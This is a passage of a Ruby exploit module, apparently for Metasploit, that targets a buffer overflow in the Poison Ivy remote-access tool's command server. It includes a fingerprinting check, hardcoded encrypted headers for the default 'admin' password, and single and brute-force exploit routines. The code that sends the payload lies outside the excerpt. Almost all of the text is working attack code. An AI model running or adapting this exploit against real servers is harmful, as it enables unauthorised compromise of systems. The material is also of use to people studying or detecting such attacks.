Poison Ivy 'CC'服务器缓冲区溢出漏洞(3)

register_advanced_options(
            [
                OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]),
            ], self.class)

end

def check
    # Fingerprints the remote service from its reply to a 256-byte all-zero
    # probe; nothing other than that probe is sent by this method.
    #
    # Returns Exploit::CheckCode::Vulnerable when the 4-byte field read after
    # the 256-byte reply equals 0x000015D0 packed little-endian, otherwise
    # Exploit::CheckCode::Safe. The verdict rests on that field alone: no
    # version or patch level is inspected, so a match identifies the service
    # type rather than proving a particular build is unpatched.
    #
    # NOTE(review): both comparisons are between byte strings read from the
    # socket and literals with high bytes; they presumably depend on this file
    # being parsed with a binary source encoding - confirm the magic comment at
    # the top of the file.

    # First 16 bytes of the reply in the case that the status message below
    # reports as the "admin" password.
    expected_prefix = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
    expected_length = [0x000015D0].pack("V")

    connect
    sock.put("\x00" * 256)
    reply = sock.read(256)
    length_field = sock.read(4)
    disconnect

    # Anything that does not announce the expected length is treated as not
    # being this service.
    return Exploit::CheckCode::Safe unless length_field == expected_length

    status =
        if reply[0, 16] == expected_prefix
            "Password appears to be \"admin\""
        else
            "Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success."
        end
    print_status(status)

    Exploit::CheckCode::Vulnerable
end

def single_exploit
    # Picks the 32-byte header and hands it to do_exploit, which is defined
    # outside this excerpt; its return value is passed straight back.
    #
    # The random branch is taken only when datastore['RANDHEADER'] is exactly
    # `true`; any other value, including the string "true", selects the fixed
    # header.
    header =
        if datastore['RANDHEADER'] == true
            # Random 32 bytes: lets the module be run repeatedly when the
            # password is not known.
            rand_text(0x20)
        else
            # Fixed 32-byte header, encrypted with the default password
            # ("admin"); per the original author it has a very good chance of
            # working even when the password was changed. The value never
            # varies between runs, which makes it a candidate byte pattern for
            # network signatures - confirm against how do_exploit puts it on
            # the wire.
            "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
        end

    do_exploit(header)
end

def brute_exploit(brute_target)
    # One brute-force iteration: logs the attempt, picks a 32-byte header and
    # hands it to do_exploit (defined outside this excerpt), returning whatever
    # that call returns.
    #
    # brute_target['Try'] is the attempt counter. Attempt 1 uses the fixed
    # header; every other attempt uses a fresh random header.
    attempt = brute_target['Try']
    first_attempt = attempt == 1

    label = first_attempt ? "Header for 'admin' password" : "Random Header"
    print_status("Bruteforcing - Try #{attempt}: #{label}")

    header =
        if first_attempt
            # Fixed 32-byte header, encrypted with the default password
            # ("admin"); per the original author it has a very good chance of
            # working even when the password was changed.
            "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
        else
            # Random 32 bytes: lets the attempt be repeated when the password
            # is not known.
            rand_text(0x20)
        end

    do_exploit(header)
end
